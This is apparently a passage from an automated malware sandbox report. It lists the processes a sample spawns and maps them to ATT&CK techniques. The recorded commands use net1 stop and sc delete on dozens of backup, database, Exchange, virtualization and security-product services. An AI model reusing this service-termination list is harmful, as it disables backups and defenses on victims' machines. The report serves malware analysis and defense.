PID:2756
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop JWService
  2⤵
  PID:2804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VMware NAT Service"
1⤵
PID:2852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeCompliance
1⤵
PID:2664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DellDRLogSvc
1⤵
PID:2884

C:\Windows\system32\sc.exe
sc delete AlibabaProtect
1⤵
PID:2856
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop MSExchangeRPC
  2⤵
  PID:2972

C:\Windows\system32\sc.exe
sc delete ZTEVdservice
1⤵
PID:1184

C:\Windows\system32\sc.exe
sc delete MMRHookService
1⤵
PID:2436
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop MSExchangeTransportLogSearch
  2⤵
  PID:2792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASLicenceServer
1⤵
PID:2480

C:\Windows\system32\sc.exe
sc delete IpOverUsbSvc
1⤵
PID:2628

C:\Windows\system32\sc.exe
sc delete KuaiYunTools
1⤵
PID:2788

C:\Windows\system32\sc.exe
sc delete KMSELDI
1⤵
PID:1660

C:\Windows\system32\sc.exe
sc delete btPanel
1⤵
PID:2488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "AliyunService"
1⤵
PID:2276
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "NetBackup Proxy Service"
  2⤵
  PID:2384

C:\Windows\system32\sc.exe
sc delete MsDtsServer100
1⤵
PID:2748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeDiagnostics
1⤵
PID:2672

C:\Windows\system32\sc.exe
sc delete OracleJobSchedulerORCL
1⤵
PID:2520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeDelivery
1⤵
PID:2380

C:\Windows\system32\sc.exe
sc delete kbasesrv
1⤵
PID:2064
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "NetBackup Legacy Network Service"
  2⤵
  PID:1660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
1⤵
PID:2584

C:\Windows\system32\sc.exe
sc delete Protect_2345Explorer
1⤵
PID:2796

C:\Windows\system32\sc.exe
sc delete wwbizsrv
1⤵
PID:2668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Apache2.2
1⤵
PID:2516

C:\Windows\system32\sc.exe
sc delete "ZTE FileTranS"
1⤵
PID:2480

C:\Windows\system32\sc.exe
sc delete "ZTE USBIP Client"
1⤵
PID:2440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WebAttendServer
1⤵
PID:340

C:\Windows\system32\sc.exe
sc delete 2345PicSvc
1⤵
PID:2696

C:\Windows\system32\sc.exe
sc delete vmware-converter-agent
1⤵
PID:2756

C:\Windows\system32\sc.exe
sc delete "ZTE USBIP Client Guard"
1⤵
PID:876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetBackup Legacy Client Service"
1⤵
PID:1184
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop MSExchangeMailboxAssistants
  2⤵
  PID:536

C:\Windows\system32\sc.exe
sc delete vmware-converter-server
1⤵
PID:2952

C:\Windows\system32\sc.exe
sc delete ftusbrdsrv
1⤵
PID:3012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Apache2.4
1⤵
PID:2808

C:\Windows\system32\sc.exe
sc delete vmware-converter-worker
1⤵
PID:2272

C:\Windows\system32\sc.exe
sc delete QQCertificateService
1⤵
PID:1724

C:\Windows\system32\sc.exe
sc delete "UtilDev Web Server Pro"
1⤵
PID:2684
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "OracleOraDb10g_homeliSQL*Plus"
  2⤵
  PID:2960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASVirtualDiskService
1⤵
PID:2972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASMsgSrv
1⤵
PID:2776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ImtsEventSvr
1⤵
PID:2920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UFNet
1⤵
PID:2580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "FileZilla Server"
1⤵
PID:536
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop NFOTPService
  2⤵
  PID:2256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc
1⤵
PID:2968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TPlusStdUpgradeService1220
1⤵
PID:1232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SBOWFDataAccess
1⤵
PID:876

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3044

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scripting

T1064

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

Impair Defenses

Modify Registry

Scripting

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/872-12-0x0000000140000000-0x000000014002C000-memory.dmp

Filesize
176KB

Download
memory/1636-2-0x00000000746F0000-0x0000000074DDE000-memory.dmp

Filesize
6.9MB

Download
memory/1636-3-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

Filesize
4KB

Download
memory/1636-6-0x0000000005790000-0x000000000581C000-memory.dmp

Filesize
560KB

Download
memory/1636-5-0x00000000002A0000-0x00000000002B2000-memory.dmp

Filesize
72KB

Download
memory/1804-22-0x0000000000400000-0x0000000000447000-memory.dmp

Filesize
284KB

Download
memory/1804-18-0x0000000000400000-0x0000000000447000-memory.dmp

Filesize
284KB

Download